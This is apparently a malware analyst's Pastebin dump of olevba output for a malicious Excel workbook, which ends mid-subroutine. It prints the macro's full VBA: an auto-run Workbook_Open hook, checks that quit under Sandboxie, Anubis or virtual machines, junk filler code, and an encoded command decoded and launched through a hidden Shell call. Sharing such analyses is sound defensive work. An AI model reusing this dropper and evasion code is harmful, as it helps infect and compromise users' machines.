SHARE
TWEET

Malicious Excel macro

dynamoo Mar 11th, 2015 212 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- Rem_8392TN.xml
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: Rem_8392TN.xml
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ÝòàÊíèãà.cls
  13. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub Workbook_Open()
  16. jhVKdsfjsd
  17. Dim siNQQVbL As Integer
  18. For siNQQVbL = 0 To 0
  19. If siNQQVbL = 5 Then End
  20. Next siNQQVbL
  21. Dim gJLryR As Integer
  22. For gJLryR = 0 To 0
  23. If gJLryR = 5 Then End
  24. Next gJLryR
  25. Dim wVKHBTQ As Integer
  26. For wVKHBTQ = 0 To 0
  27. If wVKHBTQ = 5 Then End
  28. Next wVKHBTQ
  29. End Sub
  30.  
  31.  
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33. ANALYSIS:
  34. +----------+---------------+----------------------------------------+
  35. | Type     | Keyword       | Description                            |
  36. +----------+---------------+----------------------------------------+
  37. | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
  38. +----------+---------------+----------------------------------------+
  39. -------------------------------------------------------------------------------
  40. VBA MACRO Ëèñò1.cls
  41. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43. (empty macro)
  44. -------------------------------------------------------------------------------
  45. VBA MACRO Ëèñò2.cls
  46. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  47. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  48. (empty macro)
  49. -------------------------------------------------------------------------------
  50. VBA MACRO Ëèñò3.cls
  51. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  52. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  53. (empty macro)
  54. -------------------------------------------------------------------------------
  55. VBA MACRO Class1.cls
  56. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
  57. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  58.  
  59. Private Function nxNZiOiHENlXPUXVbjKuvaMDRZpscgBqooOqJ()
  60.  
  61. Dim vowYxIwMEb As Integer
  62. vowYxIwMEb = 8:
  63. Do While vowYxIwMEb < 30
  64.    DoEvents: vowYxIwMEb = vowYxIwMEb + 1
  65. Loop
  66.  
  67. If "dJaAtNalSZ" = "QyrtgazWfE" Then End
  68.  
  69. If "AmpntVcNOs" = "xVjrBLurmC" Then End
  70.  
  71. End Function
  72.  
  73. Private Function wwWyRnRgNmuWxtGnKCTUesVCHrYSLyKjXOwpr()
  74.  
  75. If "nMxiuRPuDk" = "vPUfDSsJTW" Then End
  76.  
  77. If "ukPPoRcGjy" = "FeNoQMyGCu" Then End
  78.  
  79. GoTo mwLNUsKqdd
  80. mwLNUsKqdd:
  81.  
  82. End Function
  83.  
  84. Private Sub HLrfpFRANaGDMdPHMPNTbJmnSEbQRhkUYsigg()
  85.  
  86. GoTo rAnNVQrNAd
  87. rAnNVQrNAd:
  88.  
  89. GoTo tnYTovaSSl
  90. tnYTovaSSl:
  91.  
  92. Dim ZdjYhXjSys As Long
  93. ZdjYhXjSys = "2076":
  94.  
  95. End Sub
  96.  
  97. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  98. ANALYSIS:
  99. No suspicious keyword or IOC found.
  100. -------------------------------------------------------------------------------
  101. VBA MACRO Class2.cls
  102. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class2'
  103. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  104.  
  105. Public Function jXOwprFSxuEcnYkHFkTBlFKvTIJyJMQkaFfeH()
  106.  
  107. GoTo XdDLNoKwea
  108. XdDLNoKwea:
  109.  
  110. Dim jLVjlsRIPb As Integer
  111. jLVjlsRIPb = 7:
  112. Do While jLVjlsRIPb < 16
  113.    DoEvents: jLVjlsRIPb = jLVjlsRIPb + 1
  114. Loop
  115.  
  116. Dim AOYnziviOL As Integer
  117. AOYnziviOL = 0:
  118. Do While AOYnziviOL < 11
  119.    DoEvents: AOYnziviOL = AOYnziviOL + 1
  120. Loop
  121.  
  122. GoTo PuxvbKRVva
  123. PuxvbKRVva:
  124.  
  125. If "zpTcgBRoPO" = "qJmQylltop" Then End
  126.  
  127. Dim mCBSMwrNUZ As Integer
  128. mCBSMwrNUZ = 8:
  129. Do While mCBSMwrNUZ < 26
  130.    DoEvents: mCBSMwrNUZ = mCBSMwrNUZ + 1
  131. Loop
  132.  
  133. GoTo KxCIWGvhqw
  134. KxCIWGvhqw:
  135.  
  136. GoTo mvUfxcfdjS
  137. mvUfxcfdjS:
  138.  
  139. Dim DEiuLQYBko As Integer
  140. DEiuLQYBko = 4:
  141. Do While DEiuLQYBko < 12
  142.    DoEvents: DEiuLQYBko = DEiuLQYBko + 1
  143. Loop
  144.  
  145. End Function
  146.  
  147. Public Sub ooOqJfJYlemOplxmCtrMWrNtyQQKDqCIPGohj()
  148.  
  149. GoTo uEcnyLOMrt
  150. uEcnyLOMrt:
  151.  
  152. Dim lMRWTIQZJT As Long
  153. lMRWTIQZJT = "4654":
  154.  
  155. Dim FfeHzWnvVD As Long
  156. FfeHzWnvVD = "146":
  157.  
  158. If "CoWskbcNBd" = "kpAgatHsrf" Then End
  159.  
  160. If "FYANaGDMkW" = "HTPNTbJtnS" Then End
  161.  
  162. Dim QRhrUYTJnn As Long
  163. QRhrUYTJnn = "8655":
  164.  
  165. If "EIXdDLNoKw" = "easjLVjlsR" Then End
  166.  
  167. If "PbbptAOYnz" = "iviOLUMXPu" Then End
  168.  
  169. GoTo bKRVvamjyz
  170. bKRVvamjyz:
  171.  
  172. End Sub
  173.  
  174. Private Sub hkUYsiggGIBEIQdDLGhdpetsjEOJelqIIbCPt()
  175.  
  176. Dim vhqwqpmvUf As Integer
  177. vhqwqpmvUf = 9:
  178. Do While vhqwqpmvUf < 14
  179.    DoEvents: vhqwqpmvUf = vhqwqpmvUf + 1
  180. Loop
  181.  
  182. GoTo jSsDEiuLQY
  183. jSsDEiuLQY:
  184.  
  185. Dim ojZXXwZrOr As Long
  186. ojZXXwZrOr = "4269":
  187.  
  188. GoTo uwYUgVKCAu
  189. uwYUgVKCAu:
  190.  
  191. Dim AVChyySlZK As Integer
  192. AVChyySlZK = 6:
  193. Do While AVChyySlZK < 28
  194.    DoEvents: AVChyySlZK = AVChyySlZK + 1
  195. Loop
  196.  
  197. Dim XQSFZxuEcn As Integer
  198. XQSFZxuEcn = 10:
  199. Do While XQSFZxuEcn < 30
  200.    DoEvents: XQSFZxuEcn = XQSFZxuEcn + 1
  201. Loop
  202.  
  203. Dim MrtalMRWTI As Integer
  204. MrtalMRWTI = 7:
  205. Do While MrtalMRWTI < 3
  206.    DoEvents: MrtalMRWTI = MrtalMRWTI + 1
  207. Loop
  208.  
  209. GoTo TQkaFfeHzW
  210. TQkaFfeHzW:
  211.  
  212. Dim vVDFGCoWsk As Long
  213. vVDFGCoWsk = "5896":
  214.  
  215. End Sub
  216.  
  217. Private Sub UesVCHrYSLyKjXOwprFSxuEcnYkHFkTBlFKvT()
  218.  
  219. Dim UYTJnnmPBE As Integer
  220. UYTJnnmPBE = 3:
  221. Do While UYTJnnmPBE < 2
  222.    DoEvents: UYTJnnmPBE = UYTJnnmPBE + 1
  223. Loop
  224.  
  225. Dim DLNoKweasj As Integer
  226. DLNoKweasj = 10:
  227. Do While DLNoKweasj < 6
  228.    DoEvents: DLNoKweasj = DLNoKweasj + 1
  229. Loop
  230.  
  231. GoTo sRIPbbptAO
  232. sRIPbbptAO:
  233.  
  234. Dim nziviOLUMX As Integer
  235. nziviOLUMX = 8:
  236. Do While nziviOLUMX < 27
  237.    DoEvents: nziviOLUMX = nziviOLUMX + 1
  238. Loop
  239.  
  240. GoTo vbKRVvamjy
  241. vbKRVvamjy:
  242.  
  243. Dim pTcgBRoPOq As Integer
  244. pTcgBRoPOq = 8:
  245. Do While pTcgBRoPOq < 15
  246.    DoEvents: pTcgBRoPOq = pTcgBRoPOq + 1
  247. Loop
  248.  
  249. Dim ylltoplYmC As Integer
  250. ylltoplYmC = 6:
  251. Do While ylltoplYmC < 11
  252.    DoEvents: ylltoplYmC = ylltoplYmC + 1
  253. Loop
  254.  
  255. GoTo wrNUZqqKKx
  256. wrNUZqqKKx:
  257.  
  258. GoTo IWGvhqwqpm
  259. IWGvhqwqpm:
  260.  
  261. End Sub
  262.  
  263. Private Sub NlXPUXVbjKuvaMDRZpscgBqooOqJfJYlemOpl()
  264.  
  265. GoTo CAueAVChyy
  266. CAueAVChyy:
  267.  
  268. GoTo KqxOXQSFZx
  269. KqxOXQSFZx:
  270.  
  271. Dim EcnyLOMrta As Long
  272. EcnyLOMrta = "272":
  273.  
  274. Dim RWTIQZJTQk As Integer
  275. RWTIQZJTQk = 5:
  276. Do While RWTIQZJTQk < 19
  277.    DoEvents: RWTIQZJTQk = RWTIQZJTQk + 1
  278. Loop
  279.  
  280. Dim zWnvVDFGCo As Long
  281. zWnvVDFGCo = "5900":
  282.  
  283. Dim kbcNBdkpAg As Long
  284. kbcNBdkpAg = "1401":
  285.  
  286. If "HsrfwFYANa" = "GDMkWHTPNT" Then End
  287.  
  288. If "JtnSEbQRhr" = "UYTJnnmPBE" Then End
  289.  
  290. GoTo sjLVjlsRIP
  291. sjLVjlsRIP:
  292.  
  293. End Sub
  294.  
  295. Private Function TTHLrfpFRANaGDMdPHMPNTbJmnSEbQRhkUYsi()
  296.  
  297. Dim lYmCBSMwrN As Long
  298. lYmCBSMwrN = "4520":
  299.  
  300. Dim qqKKxCIWGv As Long
  301. qqKKxCIWGv = "2028":
  302.  
  303. If "wqpmvUfxcf" = "djSsDEiuLQ" Then End
  304.  
  305. Dim BkojZXXwZr As Long
  306. BkojZXXwZr = "3274":
  307.  
  308. Dim muwYUgVKCA As Integer
  309. muwYUgVKCA = 2:
  310. Do While muwYUgVKCA < 9
  311.    DoEvents: muwYUgVKCA = muwYUgVKCA + 1
  312. Loop
  313.  
  314. Dim VChyySlZKq As Integer
  315. VChyySlZKq = 6:
  316. Do While VChyySlZKq < 16
  317.    DoEvents: VChyySlZKq = VChyySlZKq + 1
  318. Loop
  319.  
  320. GoTo QSFZxuEcny
  321. QSFZxuEcny:
  322.  
  323. If "rtalMRWTIQ" = "ZJTQkaFfeH" Then End
  324.  
  325. Dim nvVDFGCoWs As Long
  326. nvVDFGCoWs = "8149":
  327.  
  328. End Function
  329.  
  330. Private Function TUesVCHrYSLyKjXOwprFSxuEcnYkHFkTBlFKv()
  331.  
  332. If "hrUYTJnnmP" = "BEIXdDLNoK" Then End
  333.  
  334. GoTo IPbbptAOYn
  335. IPbbptAOYn:
  336.  
  337. Dim iOLUMXPuxv As Long
  338. iOLUMXPuxv = "4273":
  339.  
  340. Dim RVvamjyzpT As Integer
  341. RVvamjyzpT = 8:
  342. Do While RVvamjyzpT < 9
  343.    DoEvents: RVvamjyzpT = RVvamjyzpT + 1
  344. Loop
  345.  
  346. If "RoPOqJmQyl" = "ltoplYmCBS" Then End
  347.  
  348. If "rNUZqqKKxC" = "IWGvhqwqpm" Then End
  349.  
  350. If "UfxcfdjSsD" = "EiuLQYBkoj" Then End
  351.  
  352. If "XXwZrOrgUm" = "uwYUgVKCAu" Then End
  353.  
  354. Dim qxOXQSFZxu As Integer
  355. qxOXQSFZxu = 8:
  356. Do While qxOXQSFZxu < 8
  357.    DoEvents: qxOXQSFZxu = qxOXQSFZxu + 1
  358. Loop
  359.  
  360. End Function
  361.  
  362. Private Sub fQcfdjLSDEinLzhqBkhcSwwWyRnRgNmuWxtGn()
  363.  
  364. GoTo cNBdkpAgat
  365. cNBdkpAgat:
  366.  
  367. GoTo srfwFYANaG
  368. srfwFYANaG:
  369.  
  370. Dim MkWHTPNTbJ As Long
  371. MkWHTPNTbJ = "1275":
  372.  
  373. Dim SEbQRhrUYT As Long
  374. SEbQRhrUYT = "5649":
  375.  
  376. Dim mPBEIXdDLN As Integer
  377. mPBEIXdDLN = 1:
  378. Do While mPBEIXdDLN < 9
  379.    DoEvents: mPBEIXdDLN = mPBEIXdDLN + 1
  380. Loop
  381.  
  382. If "easjLVjlsR" = "IPbbptAOYn" Then End
  383.  
  384. Dim JmQylltopl As Long
  385. JmQylltopl = "895":
  386.  
  387. Dim BSMwrNUZqq As Long
  388. BSMwrNUZqq = "9270":
  389.  
  390. If "xCIWGvhqwq" = "pmvUfxcfdj" Then End
  391.  
  392. End Sub
  393.  
  394. Private Sub jKuvaMDRZpscgBqooOqJfJYlemOplxmCtrMWr()
  395.  
  396. GoTo yySlZKqxOX
  397. yySlZKqxOX:
  398.  
  399. Dim SFZxuEcnyL As Integer
  400. SFZxuEcnyL = 2:
  401. Do While SFZxuEcnyL < 15
  402.    DoEvents: SFZxuEcnyL = SFZxuEcnyL + 1
  403. Loop
  404.  
  405. GoTo talMRWTIQZ
  406. talMRWTIQZ:
  407.  
  408. Dim atHsrfwFYA As Integer
  409. atHsrfwFYA = 3:
  410. Do While atHsrfwFYA < 9
  411.    DoEvents: atHsrfwFYA = atHsrfwFYA + 1
  412. Loop
  413.  
  414. GoTo tnSEbQRhrU
  415. tnSEbQRhrU:
  416.  
  417. Dim JnnmPBEIXd As Long
  418. JnnmPBEIXd = "7522":
  419.  
  420. Dim NoKweasjLV As Long
  421. NoKweasjLV = "4528":
  422.  
  423. Dim YnziviOLUM As Integer
  424. YnziviOLUM = 10:
  425. Do While YnziviOLUM < 1
  426.    DoEvents: YnziviOLUM = YnziviOLUM + 1
  427. Loop
  428.  
  429. Dim xvbKRVvamj As Integer
  430. xvbKRVvamj = 6:
  431. Do While xvbKRVvamj < 3
  432.    DoEvents: xvbKRVvamj = xvbKRVvamj + 1
  433. Loop
  434.  
  435. End Sub
  436.  
  437. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  438. ANALYSIS:
  439. No suspicious keyword or IOC found.
  440. -------------------------------------------------------------------------------
  441. VBA MACRO Class3.cls
  442. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class3'
  443. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  444.  
  445. Private Function bJmnSEbQRhkUYsiggGIBEIQdDLGhdpetsjEOJ()
  446.  
  447. Dim qqKKxCIWGv As Long
  448. qqKKxCIWGv = "2028":
  449.  
  450. If "wqpmvUfxcf" = "djSsDEiuLQ" Then End
  451.  
  452. Dim BkojZXXwZr As Long
  453. BkojZXXwZr = "3274":
  454.  
  455. Dim muwYUgVKCA As Integer
  456. muwYUgVKCA = 2:
  457. Do While muwYUgVKCA < 9
  458.    DoEvents: muwYUgVKCA = muwYUgVKCA + 1
  459. Loop
  460.  
  461. End Function
  462.  
  463. Public Sub rNtyQQKDqCIPGohjwqPMVtfQcfdjLSDEinLzh()
  464.  
  465. GoTo QkaFfeHzWn
  466. QkaFfeHzWn:
  467.  
  468. Dim VDFGCoWskb As Long
  469. VDFGCoWskb = "8643":
  470.  
  471. If "BdkpAgatHs" = "rfwFYANaGD" Then End
  472.  
  473. Dim kWHTPNTbJt As Integer
  474. kWHTPNTbJt = 1:
  475. Do While kWHTPNTbJt < 22
  476.    DoEvents: kWHTPNTbJt = kWHTPNTbJt + 1
  477. Loop
  478.  
  479. End Sub
  480.  
  481. Private Function vTIJyJMQkaFfeHsvZoVuDFGCovSkbcmBdKiAg()
  482.  
  483. Dim tAOYnziviO As Integer
  484. tAOYnziviO = 6:
  485. Do While tAOYnziviO < 21
  486.    DoEvents: tAOYnziviO = tAOYnziviO + 1
  487. Loop
  488.  
  489. Dim XPuxvbKRVv As Long
  490. XPuxvbKRVv = "3023":
  491.  
  492. If "jyzpTcgBRo" = "POqJmQyllt" Then End
  493.  
  494. GoTo plYmCBSMwr
  495. plYmCBSMwr:
  496.  
  497. End Function
  498.  
  499. Private Sub elqIIbCPtznxNZiOiHENlXPUXVbjKuvaMDRZp()
  500.  
  501. Dim jZXXwZrOrg As Integer
  502. jZXXwZrOrg = 4:
  503. Do While jZXXwZrOrg < 26
  504.    DoEvents: jZXXwZrOrg = jZXXwZrOrg + 1
  505. Loop
  506.  
  507. Dim wYUgVKCAue As Integer
  508. wYUgVKCAue = 3:
  509. Do While wYUgVKCAue < 27
  510.    DoEvents: wYUgVKCAue = wYUgVKCAue + 1
  511. Loop
  512.  
  513. If "hyySlZKqxO" = "XQSFZxuEcn" Then End
  514.  
  515. Dim LOMrtalMRW As Integer
  516. LOMrtalMRW = 4:
  517. Do While LOMrtalMRW < 20
  518.    DoEvents: LOMrtalMRW = LOMrtalMRW + 1
  519. Loop
  520.  
  521. End Sub
  522.  
  523. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  524. ANALYSIS:
  525. No suspicious keyword or IOC found.
  526. -------------------------------------------------------------------------------
  527. VBA MACRO Class4.cls
  528. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class4'
  529. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  530.  
  531. Private Sub uEcnYkHFkTBlFKvTIJyJMQkaFfeHsvZoVuDFG()
  532.  
  533. Dim CuLmwLNUsK As Integer
  534. CuLmwLNUsK = 2:
  535. Do While CuLmwLNUsK < 19
  536.    DoEvents: CuLmwLNUsK = CuLmwLNUsK + 1
  537. Loop
  538.  
  539. End Sub
  540.  
  541. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  542. ANALYSIS:
  543. No suspicious keyword or IOC found.
  544. -------------------------------------------------------------------------------
  545. VBA MACRO Class5.cls
  546. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class5'
  547. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  548.  
  549. Public Function xmCtrMWrNtyQQKDqCIPGohjwqPMVtfQcfdjLS()
  550.  
  551. Dim xVjrBLurmC As Integer
  552. xVjrBLurmC = 9:
  553. Do While xVjrBLurmC < 24
  554.    DoEvents: xVjrBLurmC = xVjrBLurmC + 1
  555. Loop
  556.  
  557. End Function
  558.  
  559. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  560. ANALYSIS:
  561. No suspicious keyword or IOC found.
  562. -------------------------------------------------------------------------------
  563. VBA MACRO dfsdf.bas
  564. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/dfsdf'
  565. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  566.  
  567.  
  568.  Private Declare Function RegOpenKeyEx Lib "advapi32" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, ByRef phkResult As Long) As Long
  569.  Private Declare Function RegQueryValueEx Lib "advapi32" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, ByRef lpType As Long, ByVal lpData As String, ByRef lpcbData As Long) As Long
  570.  Private Declare Function RegCloseKey Lib "advapi32" (ByVal hKey As Long) As Long
  571.  Const HKEY_LOCAL_MACHINE = &H80000002
  572.  
  573.  Public Function IsVirtualPCPresent() As Long
  574.  Dim lhKey As Long
  575.  Dim sBuffer As String
  576.  Dim lLen As Long
  577.  If RegOpenKeyEx(&H80000002, "SYSTEM\ControlSet001\Services\Disk\Enum", _
  578.  0, &H20019, lhKey) = 0 Then
  579.  sBuffer = Space$(255): lLen = 255
  580.  If RegQueryValueEx(lhKey, "0", 0, 1, ByVal sBuffer, lLen) = 0 Then
  581.  sBuffer = UCase(Left$(sBuffer, lLen - 1))
  582.  Select Case True
  583.  Case sBuffer Like "*VIRTUAL*": IsVirtualPCPresent = 1
  584.  Case sBuffer Like "*VMWARE*": IsVirtualPCPresent = 2
  585.  Case sBuffer Like "*VBOX*": IsVirtualPCPresent = 3
  586.  If IsVirtualPCPresent = 1 Or 2 Or 3 Then End
  587.  End Select
  588.  End If
  589.  Call RegCloseKey(lhKey)
  590.  End If
  591.  End Function
  592. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  593. ANALYSIS:
  594. +------------+----------------+-----------------------------------------+
  595. | Type       | Keyword        | Description                             |
  596. +------------+----------------+-----------------------------------------+
  597. | Suspicious | Lib            | May run code from a DLL                 |
  598. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  599. |            |                | be used to obfuscate strings (option    |
  600. |            |                | --decode to see all)                    |
  601. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  602. |            |                | may be used to obfuscate strings        |
  603. |            |                | (option --decode to see all)            |
  604. +------------+----------------+-----------------------------------------+
  605. -------------------------------------------------------------------------------
  606. VBA MACRO load.bas
  607. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/load'
  608. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  609.  Sub jhVKdsfjsd()
  610.     If IsSandBoxiePresent(1) = True Then End
  611.     If IsAnubisPresent(1) = True Then End
  612.     If IsVirtualPCPresent = True Then End
  613. oPOJidsf = MkSrpQP("Õкƒw tºÒÍȺ¨¼×Ï‘­Í¹’‹¤È¿‚£ÔͻƼu§ëÖÊȵƒ¢×ׄº­·—Þ̻Ѽ~‚¶ÒÍѴĵ֩¿Ï­}{Ú×ÊÓ‚„ƒ«–„”…‚£•‰‘{‹ƒÓÖºÙÀ„ºÙËÉ‘¸½Ä™}ˆœš¡Âˆ²Ç»»ÇÖ©œ©¾ƒ·ÓÅ}Œƒu¹êӷѬuyƨ£³m±¸åÉÉÇŽ›šè‘¹Äªuyƨ£³m±¸åÉÉÇŽ›šè‘»Û­tå×·Õ¼uyƨ£³m±¸åÉÉÇŽ›šè‘»Û­", "rcVcHUTj")
  614. Dim wfSoeUjt As Integer
  615. For wfSoeUjt = 0 To 0
  616. If wfSoeUjt = 5 Then End
  617. Next wfSoeUjt
  618. Dim tNhbQ As Integer
  619. For tNhbQ = 0 To 0
  620. If tNhbQ = 5 Then End
  621. Next tNhbQ
  622. Shell oPOJidsf, 0
  623. Dim stahzHxdYZQ As Integer
  624. For stahzHxdYZQ = 0 To 0
  625. If stahzHxdYZQ = 5 Then End
  626. Next stahzHxdYZQ
  627.     End Sub
  628.  
  629. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  630. ANALYSIS:
  631. +------------+----------------+-----------------------------------------+
  632. | Type       | Keyword        | Description                             |
  633. +------------+----------------+-----------------------------------------+
  634. | Suspicious | Shell          | May run an executable file or a system  |
  635. |            |                | command                                 |
  636. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  637. |            |                | may be used to obfuscate strings        |
  638. |            |                | (option --decode to see all)            |
  639. +------------+----------------+-----------------------------------------+
  640. -------------------------------------------------------------------------------
  641. VBA MACRO Module1.bas
  642. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  643. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  644. Private Sub gbwEJaatNBMSZQyrtgBZWfEpampntVcNOsxVj()
  645.  
  646. Dim VpfKKjMeBe As Long
  647. VpfKKjMeBe = "4141":
  648.  
  649. If "ojLHtBXPGh" = "rGIPuFlFyM" Then End
  650.  
  651. Dim kBKDFSFkhR As Long
  652. kBKDFSFkhR = "6144":
  653.  
  654. Dim lYUSYgnysX As Integer
  655. lYUSYgnysX = 9:
  656. Do While lYUSYgnysX < 19
  657.    DoEvents: lYUSYgnysX = lYUSYgnysX + 1
  658. Loop
  659.  
  660. If "WMWZDxnSsr" = "UfJmCiIQST" Then End
  661.  
  662. GoTo bJfxopAOqx
  663. bJfxopAOqx:
  664.  
  665. End Sub
  666.  
  667. Public Sub sKqddRVCpzPbKXkQNWnyqWZXDlTwxcOlabrue()
  668.  
  669. If "ttTvORVDqQ" = "YTuqDrgfwR" Then End
  670.  
  671. If "wryEVVoocg" = "NBLamvbvUR" Then End
  672.  
  673. Dim ZKChkioXxI As Long
  674. ZKChkioXxI = "7641":
  675.  
  676. If "zQemcGptOE" = "bCBdWsWlyr" Then End
  677.  
  678. Dim bcyLlHFZje As Long
  679. bcyLlHFZje = "1896":
  680.  
  681. Dim MddXQdPVcT As Long
  682. MddXQdPVcT = "6018":
  683.  
  684. End Sub
  685.  
  686. Public Function rtgBZWfEpampntVcNOsxVjrBLurmcHHgJbxbq()
  687.  
  688. Dim jLHtBXPGhr As Long
  689. jLHtBXPGhr = "2393":
  690.  
  691. Dim PuFlFyMXwk As Long
  692. PuFlFyMXwk = "6265":
  693.  
  694. GoTo DFSFkhRpal
  695. DFSFkhRpal:
  696.  
  697. If "SYgnysXJGV" = "WMWZDxnSsr" Then End
  698.  
  699. Dim JmCiIQSTPb As Long
  700. JmCiIQSTPb = "5772":
  701.  
  702. If "pAOqxvNtgg" = "UyescSENAn" Then End
  703.  
  704. End Function
  705.  
  706. Private Function QNWnyqWZXDlTwxcOlabrueiDsqqpSLOranNVQ()
  707.  
  708. Dim rgfwRBwryE As Integer
  709. rgfwRBwryE = 7:
  710. Do While rgfwRBwryE < 27
  711.    DoEvents: rgfwRBwryE = rgfwRBwryE + 1
  712. Loop
  713.  
  714. GoTo cgNBLamvbv
  715. cgNBLamvbv:
  716.  
  717. Dim RaZKChkioX As Long
  718. RaZKChkioX = "7273":
  719.  
  720. If "inzQemcGpt" = "OEbCBdWsWl" Then End
  721.  
  722. GoTo rzbcyLlHFZ
  723. rzbcyLlHFZ:
  724.  
  725. Dim eAHMddXQdP As Integer
  726. eAHMddXQdP = 5:
  727. Do While eAHMddXQdP < 29
  728.    DoEvents: eAHMddXQdP = eAHMddXQdP + 1
  729. Loop
  730.  
  731. End Function
  732.  
  733. Public Function QyrtgBZWfEpampntVcNOsxVjrBLurmcHHgJbx()
  734.  
  735. Dim XwkBKDFSFk As Integer
  736. XwkBKDFSFk = 4:
  737. Do While XwkBKDFSFk < 6
  738.    DoEvents: XwkBKDFSFk = XwkBKDFSFk + 1
  739. Loop
  740.  
  741. Dim alYUSYgnys As Long
  742. alYUSYgnys = "888":
  743.  
  744. If "VWMWZDxnSs" = "rUfJmCiIQS" Then End
  745.  
  746. GoTo vNtggUyesc
  747. vNtggUyesc:
  748.  
  749. Dim ENAnTQZqCU As Long
  750. ENAnTQZqCU = "2268":
  751.  
  752. GoTo AGoWAaFRoD
  753. AGoWAaFRoD:
  754.  
  755. End Function
  756.  
  757. Public Function brueiDsqqpSLOranNVQrnAoEDtOYTovBSSllZ()
  758.  
  759. GoTo LamvbvURaZ
  760. LamvbvURaZ:
  761.  
  762. Dim ChkioXxIin As Integer
  763. ChkioXxIin = 1:
  764. Do While ChkioXxIin < 21
  765.    DoEvents: ChkioXxIin = ChkioXxIin + 1
  766. Loop
  767.  
  768. GoTo mcGptOEbCB
  769. mcGptOEbCB:
  770.  
  771. Dim WsWlyrzbcy As Integer
  772. WsWlyrzbcy = 1:
  773. Do While WsWlyrzbcy < 22
  774.    DoEvents: WsWlyrzbcy = WsWlyrzbcy + 1
  775. Loop
  776.  
  777. Dim FZjeAHMddX As Long
  778. FZjeAHMddX = "8268":
  779.  
  780. If "PVcTbuwjdc" = "ziHsdpsqwY" Then End
  781.  
  782. End Function
  783.  
  784. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  785. ANALYSIS:
  786. No suspicious keyword or IOC found.
  787. -------------------------------------------------------------------------------
  788. VBA MACRO Module2.bas
  789. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
  790. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  791. Private Function fGTxESCRdmSmLIRpbTYbZfnOyzeQHVdtwgkFV()
  792.  
  793. Dim HLncVDFgCo As Long
  794. HLncVDFgCo = "5898":
  795.  
  796. Dim kicNIdkpHH As Long
  797. kicNIdkpHH = "1398":
  798.  
  799. If "HsyGwFYANh" = "GDMkWHTWUA" Then End
  800.  
  801. GoTo UuZEbqYhrB
  802. UuZEbqYhrB:
  803.  
  804. Dim TJnnNpIeIX As Long
  805. TJnnNpIeIX = "5651":
  806.  
  807. Dim lNokXeaTjL As Integer
  808. lNokXeaTjL = 1:
  809. Do While lNokXeaTjL < 14
  810.    DoEvents: lNokXeaTjL = lNokXeaTjL + 1
  811. Loop
  812.  
  813. Dim YiPiCpaAOF As Long
  814. YiPiCpaAOF = "9154":
  815.  
  816. If "iviOLuTEPb" = "xvbKrCWamK" Then End
  817.  
  818. End Function
  819.  
  820. Private Sub MNdNQUoeJjiLwAdsZyHJKGsaWofgqFhOmEkXX()
  821.  
